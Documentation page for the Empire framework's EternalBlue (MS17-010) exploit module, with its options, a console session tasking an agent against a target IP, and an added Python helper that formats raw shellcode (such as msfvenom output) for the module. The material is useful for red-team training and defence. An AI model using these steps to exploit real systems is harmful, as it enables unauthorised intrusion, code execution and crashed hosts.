Invoke-EternalBlue - Empire Module


This page contains detailed information about how to use the powershell/exploitation/exploit_eternalblue Empire module. For a list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-EternalBlue
Module: powershell/exploitation/exploit_eternalblue
Source code [1]: empire/server/modules/powershell/exploitation/exploit_eternalblue.yaml
Source code [2]: empire/server/modules/powershell/exploitation/exploit_eternalblue.py
MITRE ATT&CK: T1210
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: No

Port of MS17_010 Metasploit module to powershell. Exploits targeted system and executes specified shellcode. Windows 7 and 2008 R2 supported. Potential for a BSOD.

This module runs in the foreground and is OPSEC unsafe: it writes to disk and can therefore be detected by AV/EDR. The exploit is also noisy on the wire (crafted SMB traffic against the Target) and, as the description notes, can crash the target with a BSOD, so try it against a lab system before using it on anything that matters.

Note that the exploit_eternalblue module does not need administrative privileges on the host where the agent runs: an agent running as a normal user can launch it against the Target.

Required Module Options


This is a list of options that are required by the exploit_eternalblue module:

Agent
Agent to run module on.

InitialGrooms
Number of Initial Grooms.
Default value: 12.

MaxAttempts
Number of times to try the exploit (grooms are incremented by 5 on each retry).
Default value: 1.

Shellcode
Custom shellcode to inject, 0xaa,0xab,... format.

Target
IP or Hostname of target.
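
Preparing the Shellcode option, as an added example that is not part of the original page or of the Empire project: the option wants raw shellcode bytes rendered as a comma-separated list of 0xHH values, so the helper below turns a raw payload file (for instance the output of msfvenom -f raw; the path is hypothetical) into that string, and the reverse parser lets you sanity-check a pasted value before tasking the agent. The option name and format come from the option table; the function names and the sample bytes are constructed here.

```python
import re
from pathlib import Path

# The module's Shellcode option takes bytes as a comma-separated list of
# two-digit hex values: "0xaa,0xab,..." (format stated on the page).
_TOKEN = re.compile(r"^0x[0-9a-fA-F]{2}$")


def to_empire_shellcode(blob: bytes) -> str:
    """Render raw shellcode bytes in the 0xaa,0xab,... form the option expects."""
    if not blob:
        raise ValueError("empty shellcode")
    return ",".join(f"0x{b:02x}" for b in blob)


def from_empire_shellcode(text: str) -> bytes:
    """Parse an option string back to bytes; reject anything that is not 0xHH."""
    out = bytearray()
    for tok in text.replace(" ", "").split(","):
        if not _TOKEN.match(tok):
            raise ValueError(f"bad shellcode token: {tok!r}")
        out.append(int(tok, 16))
    return bytes(out)


def is_valid_shellcode_string(text: str) -> bool:
    """True if the string parses cleanly (use before pasting it into 'set Shellcode')."""
    try:
        from_empire_shellcode(text)
        return True
    except ValueError:
        return False


def set_shellcode_command(blob: bytes) -> str:
    """The exact console line for this module's Shellcode option."""
    return "set Shellcode " + to_empire_shellcode(blob)


def convert_file(path: str) -> str:
    """Convert a raw shellcode file (hypothetical path, e.g. msfvenom -f raw output)."""
    return to_empire_shellcode(Path(path).read_bytes())


# Constructed stand-in bytes (nop, nop, int3, ret); not a real payload.
SAMPLE = b"\x90\x90\xcc\xc3"

if __name__ == "__main__":
    cmd = set_shellcode_command(SAMPLE)
    print(cmd)
    # Round trip: what we emit must parse back to the same bytes.
    assert from_empire_shellcode(to_empire_shellcode(SAMPLE)) == SAMPLE
```

Whatever you feed in is injected as-is, so it must be shellcode suited to the target; the converter only fixes the encoding, not the payload.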

Exploit_eternalblue Example Usage


Here's an example of how to use the exploit_eternalblue module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/exploitation/exploit_eternalblue

 Author       Sean Dillon <sean.dillon [at] risksense.com>                           
              Dylan Davis <dylan.davis [at] risksense.com>                           
              Equation Group                                                         
              e0x70i                                                                 
 Background   False                                                                  
 Comments     https://github.com/RiskSense-Ops/MS17-010                              
              https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternal 
              blue                                                                   
              http://threat.tevora.com/eternal-blues/                                
 Description  Port of MS17_010 Metasploit module to powershell. Exploits targeted    
              system and executes specified shellcode. Windows 7 and 2008 R2         
              supported. Potential for a BSOD                                        
 Language     powershell                                                             
 Name         powershell/exploitation/exploit_eternalblue                            
 NeedsAdmin   False                                                                  
 OpsecSafe    False                                                                  
 Techniques   http://attack.mitre.org/techniques/T1210                               


,Record Options-,-------,----------,-----------------------------------,
| Name          | Value | Required | Description                       |
|---------------|-------|----------|-----------------------------------|
| Agent         |       | True     | Agent to run module on.           |
|---------------|-------|----------|-----------------------------------|
| InitialGrooms | 12    | True     | Number of Initial Grooms          |
|---------------|-------|----------|-----------------------------------|
| MaxAttempts   | 1     | True     | Number of times to try exploit    |
|               |       |          | (increment grooms by 5 each time) |
|---------------|-------|----------|-----------------------------------|
| Shellcode     |       | True     | Custom shellcode to inject,       |
|               |       |          | 0xaa,0xab,... format.             |
|---------------|-------|----------|-----------------------------------|
| Target        |       | True     | IP or Hostname of target          |
'---------------'-------'----------'-----------------------------------'

(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set InitialGrooms 12
[*] Set InitialGrooms to 12
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set MaxAttempts value
[*] Set MaxAttempts to value
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Shellcode ..shellcode..
[*] Set Shellcode to ..shellcode..
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Target 192.168.100.1
[*] Set Target to 192.168.100.1
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the agent to return the task results.

Authors


Sean Dillon <sean.dillon [at] risksense.com>
Dylan Davis <dylan.davis [at] risksense.com>
Equation Group
e0x70i

References


https://github.com/RiskSense-Ops/MS17-010
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
http://threat.tevora.com/eternal-blues/

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.